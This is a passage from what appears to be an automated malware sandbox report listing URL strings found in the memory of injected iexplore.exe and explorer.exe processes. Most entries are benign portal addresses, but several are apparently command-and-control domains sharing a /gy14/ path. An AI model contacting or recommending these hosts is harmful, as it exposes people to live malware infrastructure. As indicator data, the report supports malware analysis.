          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.expedia.com/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.co.in/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com.br/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com.tw/:
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmp, msapplication.xml2.13.drString found in binary or memory: http://www.google.com/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com//con
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.cz/
          Source: iexplore.exe, 0000000D.00000002.4173797884.000001BA5D6A0000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086409742.000001BA5D69F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.de/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.es/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.fr/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.it/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.pl/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.ru/
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.google.si/P
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iask.com/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iask.com/1Ax
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ioherstrulybeauty.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ioherstrulybeauty.com/gy14/
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ioherstrulybeauty.com/gy14/www.v72999.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.ioherstrulybeauty.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.icoUx
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000002.4159269749.000001BA5A831000.00000004.00000020.00020000.00000000.sdmp, msapplication.xml3.13.drString found in binary or memory: http://www.live.com/
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D4A9000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.live.com///K
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.loscaseros.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.loscaseros.com/gy14/
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.loscaseros.com/gy14/www.creditspisatylegko.site
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.loscaseros.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086841727.000001BA5D6D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico0x
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mavbam.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mavbam.com/gy14/
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mavbam.com/gy14/www.loscaseros.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mavbam.comReferer:
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086756358.000001BA5D6AD000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175544224.000001BA5D6AE000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: iexplore.exe, 0000000D.00000002.4175410383.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086552760.000001BA5D6AB000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D310000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175701016.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086375619.000001BA5D6AA000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: iexplore.exe, 0000000D.00000003.2086458924.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086090214.000001BA5D6BC000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086793876.000001BA5D6CD000.00000004.00000020.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4175867415.000001BA5D6D2000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086286497.000001BA5D6C3000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000003.2086670083.000001BA5D6C8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.merlin.com.pl/Hr
          Source: iexplore.exe, 0000000D.00000003.2086216931.000001BA5D6A7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mosaica.online
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mosaica.online/gy14/
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mosaica.online/gy14/www.roelofsen.online
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mosaica.online/gy14/www.thelectricandsolar.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mosaica.online/gy14/www.venitro.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mosaica.onlineReferer:
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mrbmed.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mrbmed.com/gy14/
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mrbmed.com/gy14/www.sciencemediainstitute.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mrbmed.comReferer:
          Source: iexplore.exe, 0000000E.00000002.4179072726.0000000006A15000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4184443900.0000000006AF7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/
          Source: iexplore.exe, 0000000E.00000002.4184443900.0000000006AF7000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.msn.com/$h
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/www.169cc.xyz
          Source: iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/www.ampsportss.com
          Source: iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/www.biosif.com
          Source: explorer.exe, 00000005.00000003.3108238253.000000000CBA2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000003.3105403139.000000000CB94000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/www.collline.com
          Source: iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyz/gy14/www.yzyz841.xyz
          Source: explorer.exe, 00000005.00000002.4202477697.000000000CBA5000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000D.00000002.4167657208.000001BA5D49D000.00000004.00000001.00020000.00000000.sdmp, iexplore.exe, 0000000E.00000002.4207554154.000000000AB80000.00000004.00000800.00020000.00000000.sdmp, iexplore.exe, 0000001D.00000002.4205290473.000000000A460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.mtdiyx.xyzReferer:
